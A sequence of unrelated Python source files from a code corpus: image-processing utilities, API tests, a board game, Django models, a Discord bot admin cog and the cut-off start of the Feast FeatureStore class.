- data (dict):
Dictionary representation of the returned JSON data.
- status_code (int):
HTTP response status code
- headers (dict):
Dictionary representation of the headers returned from the server.
:Constructor Args:
- response (<requests.Response>): The bare response object from the requests library.
"""
def __init__(self, response):
self._response = response
self.data = self._response.json()
@property
def status_code(self):
"""
Return the http status code of the request.
"""
return self._response.status_code
@property
def headers(self):
"""
Return the response headers.
"""
return self._response.headers
def as_response(func):
"""
Decorator function that converts the output of a function into an instance
of the <transloadit.response.Response> class.
"""
@wraps(func)
def _wrapper(*args, **kwargs):
return Response(func(*args, **kwargs))
return _wrapper
|
StarcoderdataPython
|
137298
|
<reponame>joegomes/BasicSR<gh_stars>1-10
import math
import numpy as np
import torch
def cubic(x):
"""cubic function used for calculate_weights_indices."""
absx = torch.abs(x)
absx2 = absx**2
absx3 = absx**3
return (1.5 * absx3 - 2.5 * absx2 + 1) * (
(absx <= 1).type_as(absx)) + (-0.5 * absx3 + 2.5 * absx2 - 4 * absx + 2) * (((absx > 1) *
(absx <= 2)).type_as(absx))
def calculate_weights_indices(in_length, out_length, scale, kernel, kernel_width, antialiasing):
"""Calculate weights and indices, used for imresize function.
Args:
in_length (int): Input length.
out_length (int): Output length.
scale (float): Scale factor.
kernel_width (int): Kernel width.
antialisaing (bool): Whether to apply anti-aliasing when downsampling.
"""
if (scale < 1) and antialiasing:
# Use a modified kernel (larger kernel width) to simultaneously
# interpolate and antialias
kernel_width = kernel_width / scale
# Output-space coordinates
x = torch.linspace(1, out_length, out_length)
# Input-space coordinates. Calculate the inverse mapping such that 0.5
# in output space maps to 0.5 in input space, and 0.5 + scale in output
# space maps to 1.5 in input space.
u = x / scale + 0.5 * (1 - 1 / scale)
# What is the left-most pixel that can be involved in the computation?
left = torch.floor(u - kernel_width / 2)
# What is the maximum number of pixels that can be involved in the
# computation? Note: it's OK to use an extra pixel here; if the
# corresponding weights are all zero, it will be eliminated at the end
# of this function.
p = math.ceil(kernel_width) + 2
# The indices of the input pixels involved in computing the k-th output
# pixel are in row k of the indices matrix.
indices = left.view(out_length, 1).expand(out_length, p) + torch.linspace(0, p - 1, p).view(1, p).expand(
out_length, p)
# The weights used to compute the k-th output pixel are in row k of the
# weights matrix.
distance_to_center = u.view(out_length, 1).expand(out_length, p) - indices
# apply cubic kernel
if (scale < 1) and antialiasing:
weights = scale * cubic(distance_to_center * scale)
else:
weights = cubic(distance_to_center)
# Normalize the weights matrix so that each row sums to 1.
weights_sum = torch.sum(weights, 1).view(out_length, 1)
weights = weights / weights_sum.expand(out_length, p)
# If a column in weights is all zero, get rid of it. only consider the
# first and last column.
weights_zero_tmp = torch.sum((weights == 0), 0)
if not math.isclose(weights_zero_tmp[0], 0, rel_tol=1e-6):
indices = indices.narrow(1, 1, p - 2)
weights = weights.narrow(1, 1, p - 2)
if not math.isclose(weights_zero_tmp[-1], 0, rel_tol=1e-6):
indices = indices.narrow(1, 0, p - 2)
weights = weights.narrow(1, 0, p - 2)
weights = weights.contiguous()
indices = indices.contiguous()
sym_len_s = -indices.min() + 1
sym_len_e = indices.max() - in_length
indices = indices + sym_len_s - 1
return weights, indices, int(sym_len_s), int(sym_len_e)
@torch.no_grad()
def imresize(img, scale, antialiasing=True):
"""imresize function same as MATLAB.
It now only supports bicubic.
The same scale applies for both height and width.
Args:
img (Tensor | Numpy array):
Tensor: Input image with shape (c, h, w), [0, 1] range.
Numpy: Input image with shape (h, w, c), [0, 1] range.
scale (float): Scale factor. The same scale applies for both height
and width.
antialisaing (bool): Whether to apply anti-aliasing when downsampling.
Default: True.
Returns:
Tensor: Output image with shape (c, h, w), [0, 1] range, w/o round.
"""
squeeze_flag = False
if type(img).__module__ == np.__name__: # numpy type
numpy_type = True
if img.ndim == 2:
img = img[:, :, None]
squeeze_flag = True
img = torch.from_numpy(img.transpose(2, 0, 1)).float()
else:
numpy_type = False
if img.ndim == 2:
img = img.unsqueeze(0)
squeeze_flag = True
in_c, in_h, in_w = img.size()
out_h, out_w = math.ceil(in_h * scale), math.ceil(in_w * scale)
kernel_width = 4
kernel = 'cubic'
# get weights and indices
weights_h, indices_h, sym_len_hs, sym_len_he = calculate_weights_indices(in_h, out_h, scale, kernel, kernel_width,
antialiasing)
weights_w, indices_w, sym_len_ws, sym_len_we = calculate_weights_indices(in_w, out_w, scale, kernel, kernel_width,
antialiasing)
# process H dimension
# symmetric copying
img_aug = torch.FloatTensor(in_c, in_h + sym_len_hs + sym_len_he, in_w)
img_aug.narrow(1, sym_len_hs, in_h).copy_(img)
sym_patch = img[:, :sym_len_hs, :]
inv_idx = torch.arange(sym_patch.size(1) - 1, -1, -1).long()
sym_patch_inv = sym_patch.index_select(1, inv_idx)
img_aug.narrow(1, 0, sym_len_hs).copy_(sym_patch_inv)
sym_patch = img[:, -sym_len_he:, :]
inv_idx = torch.arange(sym_patch.size(1) - 1, -1, -1).long()
sym_patch_inv = sym_patch.index_select(1, inv_idx)
img_aug.narrow(1, sym_len_hs + in_h, sym_len_he).copy_(sym_patch_inv)
out_1 = torch.FloatTensor(in_c, out_h, in_w)
kernel_width = weights_h.size(1)
for i in range(out_h):
idx = int(indices_h[i][0])
for j in range(in_c):
out_1[j, i, :] = img_aug[j, idx:idx + kernel_width, :].transpose(0, 1).mv(weights_h[i])
# process W dimension
# symmetric copying
out_1_aug = torch.FloatTensor(in_c, out_h, in_w + sym_len_ws + sym_len_we)
out_1_aug.narrow(2, sym_len_ws, in_w).copy_(out_1)
sym_patch = out_1[:, :, :sym_len_ws]
inv_idx = torch.arange(sym_patch.size(2) - 1, -1, -1).long()
sym_patch_inv = sym_patch.index_select(2, inv_idx)
out_1_aug.narrow(2, 0, sym_len_ws).copy_(sym_patch_inv)
sym_patch = out_1[:, :, -sym_len_we:]
inv_idx = torch.arange(sym_patch.size(2) - 1, -1, -1).long()
sym_patch_inv = sym_patch.index_select(2, inv_idx)
out_1_aug.narrow(2, sym_len_ws + in_w, sym_len_we).copy_(sym_patch_inv)
out_2 = torch.FloatTensor(in_c, out_h, out_w)
kernel_width = weights_w.size(1)
for i in range(out_w):
idx = int(indices_w[i][0])
for j in range(in_c):
out_2[j, :, i] = out_1_aug[j, :, idx:idx + kernel_width].mv(weights_w[i])
if squeeze_flag:
out_2 = out_2.squeeze(0)
if numpy_type:
out_2 = out_2.numpy()
if not squeeze_flag:
out_2 = out_2.transpose(1, 2, 0)
return out_2
def rgb2ycbcr(img, y_only=False):
"""Convert a RGB image to YCbCr image.
This function produces the same results as Matlab's `rgb2ycbcr` function.
It implements the ITU-R BT.601 conversion for standard-definition
television. See more details in
https://en.wikipedia.org/wiki/YCbCr#ITU-R_BT.601_conversion.
It differs from a similar function in cv2.cvtColor: `RGB <-> YCrCb`.
In OpenCV, it implements a JPEG conversion. See more details in
https://en.wikipedia.org/wiki/YCbCr#JPEG_conversion.
Args:
img (ndarray): The input image. It accepts:
1. np.uint8 type with range [0, 255];
2. np.float32 type with range [0, 1].
y_only (bool): Whether to only return Y channel. Default: False.
Returns:
ndarray: The converted YCbCr image. The output image has the same type
and range as input image.
"""
img_type = img.dtype
img = _convert_input_type_range(img)
if y_only:
out_img = np.dot(img, [65.481, 128.553, 24.966]) + 16.0
else:
out_img = np.matmul(
img, [[65.481, -37.797, 112.0], [128.553, -74.203, -93.786], [24.966, 112.0, -18.214]]) + [16, 128, 128]
out_img = _convert_output_type_range(out_img, img_type)
return out_img
def bgr2ycbcr(img, y_only=False):
"""Convert a BGR image to YCbCr image.
The bgr version of rgb2ycbcr.
It implements the ITU-R BT.601 conversion for standard-definition
television. See more details in
https://en.wikipedia.org/wiki/YCbCr#ITU-R_BT.601_conversion.
It differs from a similar function in cv2.cvtColor: `BGR <-> YCrCb`.
In OpenCV, it implements a JPEG conversion. See more details in
https://en.wikipedia.org/wiki/YCbCr#JPEG_conversion.
Args:
img (ndarray): The input image. It accepts:
1. np.uint8 type with range [0, 255];
2. np.float32 type with range [0, 1].
y_only (bool): Whether to only return Y channel. Default: False.
Returns:
ndarray: The converted YCbCr image. The output image has the same type
and range as input image.
"""
img_type = img.dtype
img = _convert_input_type_range(img)
if y_only:
out_img = np.dot(img, [24.966, 128.553, 65.481]) + 16.0
else:
out_img = np.matmul(
img, [[24.966, 112.0, -18.214], [128.553, -74.203, -93.786], [65.481, -37.797, 112.0]]) + [16, 128, 128]
out_img = _convert_output_type_range(out_img, img_type)
return out_img
def ycbcr2rgb(img):
"""Convert a YCbCr image to RGB image.
This function produces the same results as Matlab's ycbcr2rgb function.
It implements the ITU-R BT.601 conversion for standard-definition
television. See more details in
https://en.wikipedia.org/wiki/YCbCr#ITU-R_BT.601_conversion.
It differs from a similar function in cv2.cvtColor: `YCrCb <-> RGB`.
In OpenCV, it implements a JPEG conversion. See more details in
https://en.wikipedia.org/wiki/YCbCr#JPEG_conversion.
Args:
img (ndarray): The input image. It accepts:
1. np.uint8 type with range [0, 255];
2. np.float32 type with range [0, 1].
Returns:
ndarray: The converted RGB image. The output image has the same type
and range as input image.
"""
img_type = img.dtype
img = _convert_input_type_range(img) * 255
out_img = np.matmul(img, [[0.00456621, 0.00456621, 0.00456621], [0, -0.00153632, 0.00791071],
[0.00625893, -0.00318811, 0]]) * 255.0 + [-222.921, 135.576, -276.836] # noqa: E126
out_img = _convert_output_type_range(out_img, img_type)
return out_img
def ycbcr2bgr(img):
"""Convert a YCbCr image to BGR image.
The bgr version of ycbcr2rgb.
It implements the ITU-R BT.601 conversion for standard-definition
television. See more details in
https://en.wikipedia.org/wiki/YCbCr#ITU-R_BT.601_conversion.
It differs from a similar function in cv2.cvtColor: `YCrCb <-> BGR`.
In OpenCV, it implements a JPEG conversion. See more details in
https://en.wikipedia.org/wiki/YCbCr#JPEG_conversion.
Args:
img (ndarray): The input image. It accepts:
1. np.uint8 type with range [0, 255];
2. np.float32 type with range [0, 1].
Returns:
ndarray: The converted BGR image. The output image has the same type
and range as input image.
"""
img_type = img.dtype
img = _convert_input_type_range(img) * 255
out_img = np.matmul(img, [[0.00456621, 0.00456621, 0.00456621], [0.00791071, -0.00153632, 0],
[0, -0.00318811, 0.00625893]]) * 255.0 + [-276.836, 135.576, -222.921] # noqa: E126
out_img = _convert_output_type_range(out_img, img_type)
return out_img
def _convert_input_type_range(img):
"""Convert the type and range of the input image.
It converts the input image to np.float32 type and range of [0, 1].
It is mainly used for pre-processing the input image in colorspace
convertion functions such as rgb2ycbcr and ycbcr2rgb.
Args:
img (ndarray): The input image. It accepts:
1. np.uint8 type with range [0, 255];
2. np.float32 type with range [0, 1].
Returns:
(ndarray): The converted image with type of np.float32 and range of
[0, 1].
"""
img_type = img.dtype
img = img.astype(np.float32)
if img_type == np.float32:
pass
elif img_type == np.uint8:
img /= 255.
else:
raise TypeError(f'The img type should be np.float32 or np.uint8, but got {img_type}')
return img
def _convert_output_type_range(img, dst_type):
"""Convert the type and range of the image according to dst_type.
It converts the image to desired type and range. If `dst_type` is np.uint8,
images will be converted to np.uint8 type with range [0, 255]. If
`dst_type` is np.float32, it converts the image to np.float32 type with
range [0, 1].
It is mainly used for post-processing images in colorspace convertion
functions such as rgb2ycbcr and ycbcr2rgb.
Args:
img (ndarray): The image to be converted with np.float32 type and
range [0, 255].
dst_type (np.uint8 | np.float32): If dst_type is np.uint8, it
converts the image to np.uint8 type with range [0, 255]. If
dst_type is np.float32, it converts the image to np.float32 type
with range [0, 1].
Returns:
(ndarray): The converted image with desired type and range.
"""
if dst_type not in (np.uint8, np.float32):
raise TypeError(f'The dst_type should be np.float32 or np.uint8, but got {dst_type}')
if dst_type == np.uint8:
img = img.round()
else:
img /= 255.
return img.astype(dst_type)
|
StarcoderdataPython
|
176985
|
<reponame>raphael-abrantes/exercises-python
from random import randint
from time import sleep
from operator import itemgetter #usando pra pegar uma parte do dicionario 0 = chave / 1 = valor
jogo = dict()
rank = list()
cont = 0
while True:
num = randint(1,6)
if num not in jogo.values():
cont += 1
jogo[f'jogador{cont}'] = num
if cont == 4:
break
for k,v in jogo.items():
print(f'{k} tirou {v} no dado.')
sleep(0.5)
print('~*+'*10)
print(' -====RANKING====-')
rank = sorted(jogo.items(), key=itemgetter(1), reverse=True)
for i, r in enumerate(rank):
print(f'Em {i+1}º lugar, {r[0]} com {r[1]}')
sleep(0.5)
|
StarcoderdataPython
|
9722038
|
<gh_stars>0
from unittest import IsolatedAsyncioTestCase
from src.pyscoresaber import ScoreSaberAPI, NotFoundException
class TestScoreSaber(IsolatedAsyncioTestCase):
valid_player_ids = [
"76561198029447509",
"76561198333869741",
"76561198187936410",
"76561198835772160",
"76561197995162898",
"76561198153101808",
"2538637699496776"
]
invalid_player_id = "656119802447509"
async def asyncSetUp(self):
self.scoresaber = ScoreSaberAPI()
await self.scoresaber.start()
async def asyncTearDown(self):
await self.scoresaber.close()
async def test_players(self):
players = await self.scoresaber.players()
assert len(players) > 0
async def test_player_basic_valid(self):
player = await self.scoresaber.player_basic(self.valid_player_ids[0])
assert player.player_id == self.valid_player_ids[0]
async def test_player_basic_invalid(self):
with self.assertRaises(NotFoundException):
await self.scoresaber.player_basic(self.invalid_player_id)
async def test_player_full_valid(self):
player = await self.scoresaber.player_full(self.valid_player_ids[0])
assert player.player_id == self.valid_player_ids[0]
async def test_player_full_invalid(self):
with self.assertRaises(NotFoundException):
await self.scoresaber.player_full(self.invalid_player_id)
async def test_player_scores_recent_valid(self):
scores = await self.scoresaber.player_scores_recent(self.valid_player_ids[0])
assert len(scores) > 0
async def test_player_scores_recent_invalid(self):
with self.assertRaises(NotFoundException):
await self.scoresaber.player_scores_recent(self.invalid_player_id)
async def test_player_scores_top_valid(self):
scores_1 = await self.scoresaber.player_scores_top(self.valid_player_ids[0], 1)
assert len(scores_1) > 0
scores_2 = await self.scoresaber.player_scores_top(self.valid_player_ids[0], 2)
assert len(scores_2) > 0
async def test_player_scores_top_invalid(self):
with self.assertRaises(NotFoundException):
await self.scoresaber.player_scores_top(self.invalid_player_id, 1)
with self.assertRaises(NotFoundException):
await self.scoresaber.player_scores_top(self.invalid_player_id, 2)
async def test_player_scores_top_invalid_page(self):
scores_1 = await self.scoresaber.player_scores_recent(self.valid_player_ids[0], 248)
assert len(scores_1) > 7
with self.assertRaises(NotFoundException):
await self.scoresaber.player_scores_recent(self.valid_player_ids[0], 12412312)
async def test_players_basic(self):
async for player in self.scoresaber.players_basic(self.valid_player_ids):
assert player.player_id in self.valid_player_ids
async def test_players_full(self):
async for player in self.scoresaber.players_full(self.valid_player_ids):
assert player.player_id in self.valid_player_ids
async def test_player_scores_recent_all(self):
pages = 0
async for scores in self.scoresaber.player_scores_recent_all(self.valid_player_ids[0]):
if pages > 2:
break
assert len(scores) > 0
pages += 1
async def test_player_scores_top_all(self):
pages = 0
async for scores in self.scoresaber.player_scores_top_all(self.valid_player_ids[0]):
if pages > 2:
break
assert len(scores) > 0
pages += 1
|
StarcoderdataPython
|
5118129
|
<filename>gym_tak/tak/game/tak_game.py
from gym_tak.tak.board import Presets, Board
from gym_tak.tak.piece import Colors, Types
from gym_tak.tak.player import Player
class TakGame:
def __init__(self, preset: Presets, player1: str, player2: str) -> None:
super().__init__()
self.preset = preset
self.board = Board(preset)
self.player1 = Player(player1, self, Colors.BLACK)
self.player2 = Player(player2, self, Colors.WHITE)
self.winner = None
self.next_player = self.player1
self.active = True
self.turn = 1
def can_move(self, player: Player, column_from: int, row_from: int, column_to: int, row_to: int, pieces: int) -> bool:
return self.active and player is self.next_player and self.board.can_move(player.hand.color, column_from, row_from,
column_to, row_to, pieces)
def move(self, player: Player, column_from: int, row_from: int, column_to: int, row_to: int, pieces: int) -> None:
print(player.name + " moving from column " + str(column_from) + " row " + str(row_from) + " to column " + str(column_to) + " row " + str(row_to))
assert self.can_move(player, column_from, row_from, column_to, row_to, pieces)
self.board.move(column_from, row_from, column_to, row_to, pieces)
self.next_player = self.get_other_player(self.next_player)
self.turn += 1
def can_place(self, player: Player, column: int, row: int, type_: Types) -> bool:
return self.active and player is self.next_player and player.hand.has(type_) and self.board.rows[row, column, 0] == 0
def place(self, player: Player, column: int, row: int, type_: Types) -> None:
print(player.name + " placing in column " + str(column) + " row " + str(row))
assert self.can_place(player, column, row, type_)
piece = player.hand.take_piece(type_)
self.board.place(piece, column, row)
self.next_player = self.player2
self.turn += 1
def get_player(self, color: Colors) -> Player:
if color is Colors.BLACK:
return self.player1
elif color is Colors.WHITE:
return self.player2
else:
raise ValueError('Unrecognized color %s' % color)
def get_other_player(self, player: Player) -> Player:
if player is self.player1:
return self.player2
elif player is self.player2:
return self.player1
else:
raise ValueError('Player %s is not in this game' % player.name)
def surrender(self, player: Player) -> None:
self.active = False
self.winner = self.get_other_player(player)
def reset(self) -> None:
self.board.reset()
self.player1.reset()
self.player2.reset()
self.winner = None
self.next_player = self.player1
self.active = True
self.turn = 1
|
StarcoderdataPython
|
5055374
|
<filename>ccxt_rate_limiter/okex.py
# not accurate
def okex_wrap_defs():
# https://github.com/ccxt/ccxt/blob/master/python/ccxt/okex.py#L104
return [
{
'regex': 'Get|Post|Delete',
'tags': ['all'],
'count': 1,
},
{
'regex': 'Get.*(Position|Balance)',
'tags': ['get_position'],
'count': 1,
},
{
'regex': 'Get.*Order',
'tags': ['get_order'],
'count': 1,
},
{
'regex': 'Get.*Fill',
'tags': ['get_fill'],
'count': 1,
},
{
'regex': 'Get.*Config',
'tags': ['get_config'],
'count': 1,
},
]
# 細かすぎるので、デフォルトよりも短いもので、重要なもののみ
# https://www.okex.com/docs/en/#summary-limit
def okex_limits():
return [
{
'tag': 'all',
'period_sec': 1,
'count': 6
},
{
'tag': 'get_position',
'period_sec': 2,
'count': 10
},
{
'tag': 'get_order',
'period_sec': 2,
'count': 10
},
{
'tag': 'get_fill',
'period_sec': 2,
'count': 10
},
{
'tag': 'get_config',
'period_sec': 2,
'count': 5
},
]
|
StarcoderdataPython
|
1722037
|
<filename>apps/courses/models.py<gh_stars>10-100
# -*-coding:utf-8-*-
# -------------------python--------------
from __future__ import unicode_literals
from datetime import datetime
import sys
# -------------------django---------------
from django.db import models
# -------------------model----------------
from organization.models import CourseOrg, Teacher
from DjangoUeditor.models import UEditorField
# Create your models here.
reload(sys)
sys.setdefaultencoding('utf8')
class Course(models.Model):
course_org = models.ForeignKey(CourseOrg, verbose_name=u"课程机构", null=True, blank=True)
name = models.CharField(max_length=50, verbose_name=u"课程名")
desc = models.CharField(max_length=300, verbose_name=u"课程描述")
# 修改imagepath,不能传y m 进来,不能加斜杠是一个相对路径,相对于setting中配置的mediaroot
detail = UEditorField(verbose_name=u"课程详情", width=600, height=300, imagePath="courses/ueditor/", filePath="courses/ueditor/", default='')
is_banner = models.BooleanField(default=False, verbose_name=u"是否轮播")
is_banner = models.BooleanField(default=False, verbose_name=u"是否轮播")
teacher = models.ForeignKey(Teacher, verbose_name=u"讲师", null=True, blank=True)
degree = models.CharField(verbose_name=u"难度", choices=(("cj", u"初级"), ("zj", u"中级"), ("gj", u"高级")), max_length=2)
learn_times = models.IntegerField(default=0, verbose_name=u"学习时长(分钟)")
students = models.IntegerField(default=0, verbose_name=u"学习人数")
fav_nums = models.IntegerField(default=0, verbose_name=u"收藏人数")
image = models.ImageField(upload_to="courses/%Y/%m", verbose_name=u"封面图", max_length=100)
click_nums = models.IntegerField(default=0, verbose_name=u"点击数")
category = models.CharField(default=u"python", max_length=50, verbose_name=u"课程类别")
tag = models.CharField(default="", verbose_name=u"课程标签", max_length=20)
you_know = models.CharField(default="", max_length=300, verbose_name=u"课程须知")
teacher_tell = models.CharField(default="", max_length=300, verbose_name=u"老师说")
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"课程"
verbose_name_plural = verbose_name
# -----获取课程章节数--------------
def get_zj_nums(self):
return self.lesson_set.all().count()
def get_learn_users(self):
return self.usercourse_set.all()[:5]
# 获取课程所有章节
def get_course_lesson(self):
return self.lesson_set.all().order_by('-add_time')
def __unicode__(self):
return self.name
class Lesson(models.Model):
course = models.ForeignKey(Course, verbose_name=u"课程")
name = models.CharField(max_length=100, verbose_name=u"章节名")
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"章节"
verbose_name_plural = verbose_name
# 获取章节视频
def get_lesson_video(self):
return self.video_set.all()
def __unicode__(self):
return self.name
class Video(models.Model):
lesson = models.ForeignKey(Lesson, verbose_name=u"章节")
name = models.CharField(max_length=100, verbose_name=u"视频名")
url = models.CharField(max_length=200, default="", verbose_name=u"访问地址")
learn_times = models.IntegerField(default=0, verbose_name=u"学习时长(分钟)")
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"视频"
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
class CourseResource(models.Model):
course = models.ForeignKey(Course, verbose_name=u"课程")
name = models.CharField(max_length=100, verbose_name=u"名称")
download = models.FileField(upload_to="course/resource/%Y/%m",verbose_name=u"资源文件", max_length=100)
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"课程资源"
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
|
StarcoderdataPython
|
8002340
|
import click
from testplan.cli.utils.command_list import CommandList
from testplan.importers.cppunit import CPPUnitResultImporter
from testplan.importers.gtest import GTestResultImporter
reader_commands = CommandList()
def with_input(fn):
return click.argument(
"source", type=click.Path(exists=True), required=True
)(fn)
def with_plan_options(fn):
options = [
click.option(
"-n",
"--name",
"name",
type=str,
help="The name of the generated testplan and test",
),
click.option(
"-d",
"--description",
"description",
type=str,
help="Description of the result",
),
]
for option_decorator in options[::-1]:
fn = option_decorator(fn)
return fn
@reader_commands.command(name="fromcppunit")
@with_input
@with_plan_options
def from_cppunit(source, name, description):
def parse(result):
importer = CPPUnitResultImporter(source, name, description)
return importer.import_result().as_test_report()
return parse
@reader_commands.command(name="fromgtest")
@with_input
@with_plan_options
def from_gtest(source, name, description):
def parse(result):
importer = GTestResultImporter(source, name, description)
return importer.import_result().as_test_report()
return parse
|
StarcoderdataPython
|
11332366
|
<filename>cogs/admin.py
import discord
from discord.ext import commands
from logging import info
import jishaku
import os
import sys
from core.database import SQL # pylint: disable=import-error
from core.files import load_locales
class Admin(commands.Cog):
def __init__(self, bot):
"""Комманды для владельца бота."""
self.bot = bot
self.sql = SQL(bot.db).sql
async def cog_check(self, ctx):
if await self.bot.is_owner(ctx.author):
return True
raise commands.NotOwner()
@commands.command(hidden=True, aliases=['reboot'])
async def restart(self, ctx):
await ctx.send('> Restart')
os.execl(sys.executable, sys.executable, *sys.argv) # nosec
@commands.group(name="sql",
invoke_without_command=True,
hidden=True)
async def sql_cmd(self, ctx, *, code: jishaku.codeblocks.codeblock_converter):
"""Исполнить запрос к PostgreSQL."""
requests = code.content.split(";")
out = []
line = 0
returned = "RESULT\n\n"
for request in requests:
if not request: # '' case
continue
try:
answer = await self.sql(request)
except Exception as e:
answer = f"{type(e).__name__}: {e}"
out.append(answer)
for result in out:
returned += f"Line {line}: ```{result}```\n\n"
line += 1
if len(returned) > 1997:
returned = returned[:1997] + "..."
await ctx.send(returned)
@sql_cmd.command(hidden=True)
async def backup(self, ctx):
"""Создать резервную копию базы данных."""
os.system(f'pg_dump {self.bot.config["sqlPath"]} > backup.psql') # nosec
await ctx.author.send(
"Backup loaded",
file=discord.File("backup.psql"))
@commands.command(hidden=True)
async def update(self, ctx):
"""Git pull and restart of the bot"""
if os.system('git pull') != 0:
return await ctx.send('Error')
await ctx.invoke(self.restart)
@commands.command(hidden=True, aliases=["rl", "reload_locales", "rlocale", "reloadl"])
async def reload_locale(self, ctx):
info('Locale reloaded by owner')
self.bot.locales = load_locales()
await ctx.send('Reloaded.')
def setup(bot):
cog = Admin(bot)
bot.add_cog(cog)
|
StarcoderdataPython
|
6583992
|
<reponame>walkr/ciex<gh_stars>0
# Utility functions
import sys
from ciex.contrib.workers.elixir import *
from ciex.contrib.workers.golang import *
def load_contrib_worker(worker_name):
""" Load a local worker """
return globals()[worker_name]
def load_other_worker(worker_dirpath, worker_modname, worker_name):
""" Add path to sys.path and load worker """
if worker_dirpath not in sys.path:
sys.path.append(worker_dirpath)
mod = __import__(worker_modname)
return getattr(mod, worker_name)
def load_worker(worker_dirpath, worker_modname, worker_name):
""" Load worker class """
# Local
if worker_dirpath == worker_modname == '.':
return load_contrib_worker(worker_name)
# Other
return load_other_worker(worker_dirpath, worker_modname, worker_name)
|
StarcoderdataPython
|
3224889
|
<gh_stars>0
def add_numbers(x, y):
"""Add numbers together"""
if type(x) != int or type(y) != int:
return None
return x + y
|
StarcoderdataPython
|
3469407
|
<gh_stars>0
# Copyright 2019 The Feast Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional, Tuple, Union
import pandas as pd
import pyarrow
from feast.data_source import FileSource
from feast.entity import Entity
from feast.feature_view import FeatureView
from feast.infra.provider import Provider, get_provider
from feast.offline_store import (
RetrievalJob,
get_offline_store,
get_offline_store_for_retrieval,
)
from feast.protos.feast.types.EntityKey_pb2 import EntityKey as EntityKeyProto
from feast.protos.feast.types.Value_pb2 import Value as ValueProto
from feast.registry import Registry
from feast.repo_config import (
LocalOnlineStoreConfig,
OnlineStoreConfig,
RepoConfig,
load_repo_config,
)
from feast.type_map import python_value_to_proto_value
class FeatureStore:
"""
A FeatureStore object is used to define, create, and retrieve features.
"""
config: RepoConfig
def __init__(
self, repo_path: Optional[str] = None, config: Optional[RepoConfig] = None,
):
if repo_path is not None and config is not None:
raise ValueError("You cannot specify both repo_path and config")
if config is not None:
self.config = config
elif repo_path is not None:
self.config = load_repo_config(Path(repo_path))
else:
self.config = RepoConfig(
metadata_store="./metadata.db",
project="default",
provider="local",
online_store=OnlineStoreConfig(
local=LocalOnlineStoreConfig("online_store.db")
),
)
def _get_provider(self) -> Provider:
return get_provider(self.config)
def _get_registry(self) -> Registry:
return Registry(self.config.metadata_store)
def apply(self, objects: List[Union[FeatureView, Entity]]):
"""Register objects to metadata store and update related infrastructure.
The apply method registers one or more definitions (e.g., Entity, FeatureView) and registers or updates these
objects in the Feast registry. Once the registry has been updated, the apply method will update related
infrastructure (e.g., create tables in an online store) in order to reflect these new definitions. All
operations are idempotent, meaning they can safely be rerun.
Args: objects (List[Union[FeatureView, Entity]]): A list of FeatureView or Entity objects that should be
registered
Examples:
Register a single Entity and FeatureView.
>>> from feast.feature_store import FeatureStore
>>> from feast import Entity, FeatureView, Feature, ValueType, FileSource
>>> from datetime import timedelta
>>>
>>> fs = FeatureStore()
>>> customer_entity = Entity(name="customer", value_type=ValueType.INT64, description="customer entity")
>>> customer_feature_view = FeatureView(
>>> name="customer_fv",
>>> entities=["customer"],
>>> features=[Feature(name="age", dtype=ValueType.INT64)],
>>> input=FileSource(path="file.parquet", event_timestamp_column="timestamp"),
>>> ttl=timedelta(days=1)
>>> )
>>> fs.apply([customer_entity, customer_feature_view])
"""
# TODO: Add locking
# TODO: Optimize by only making a single call (read/write)
# TODO: Add infra update operation (currently we are just writing to registry)
registry = self._get_registry()
for ob in objects:
if isinstance(ob, FeatureView):
registry.apply_feature_view(ob, project=self.config.project)
elif isinstance(ob, Entity):
registry.apply_entity(ob, project=self.config.project)
else:
raise ValueError(
f"Unknown object type ({type(ob)}) provided as part of apply() call"
)
def get_historical_features(
self, entity_df: Union[pd.DataFrame, str], feature_refs: List[str],
) -> RetrievalJob:
"""Enrich an entity dataframe with historical feature values for either training or batch scoring.
This method joins historical feature data from one or more feature views to an entity dataframe by using a time
travel join.
Each feature view is joined to the entity dataframe using all entities configured for the respective feature
view. All configured entities must be available in the entity dataframe. Therefore, the entity dataframe must
contain all entities found in all feature views, but the individual feature views can have different entities.
Time travel is based on the configured TTL for each feature view. A shorter TTL will limit the
amount of scanning that will be done in order to find feature data for a specific entity key. Setting a short
TTL may result in null values being returned.
Args:
entity_df (Union[pd.DataFrame, str]): An entity dataframe is a collection of rows containing all entity
columns (e.g., customer_id, driver_id) on which features need to be joined, as well as a event_timestamp
column used to ensure point-in-time correctness. Either a Pandas DataFrame can be provided or a string
SQL query. The query must be of a format supported by the configured offline store (e.g., BigQuery)
feature_refs: A list of features that should be retrieved from the offline store. Feature references are of
the format "feature_view:feature", e.g., "customer_fv:daily_transactions".
Returns:
RetrievalJob which can be used to materialize the results.
Examples:
Retrieve historical features using a BigQuery SQL entity dataframe
>>> from feast.feature_store import FeatureStore
>>>
>>> fs = FeatureStore(config=RepoConfig(provider="gcp"))
>>> retrieval_job = fs.get_historical_features(
>>> entity_df="SELECT event_timestamp, order_id, customer_id from gcp_project.my_ds.customer_orders",
>>> feature_refs=["customer:age", "customer:avg_orders_1d", "customer:avg_orders_7d"]
>>> )
>>> feature_data = job.to_df()
>>> model.fit(feature_data) # insert your modeling framework here.
"""
registry = self._get_registry()
all_feature_views = registry.list_feature_views(project=self.config.project)
feature_views = _get_requested_feature_views(feature_refs, all_feature_views)
offline_store = get_offline_store_for_retrieval(feature_views)
job = offline_store.get_historical_features(
self.config, feature_views, feature_refs, entity_df
)
return job
def materialize(
self,
feature_views: Optional[List[str]],
start_date: datetime,
end_date: datetime,
) -> None:
"""
Materialize data from the offline store into the online store.
This method loads feature data in the specified interval from either
the specified feature views, or all feature views if none are specified,
into the online store where it is available for online serving.
Args:
feature_views (List[str]): Optional list of feature view names. If selected, will only run
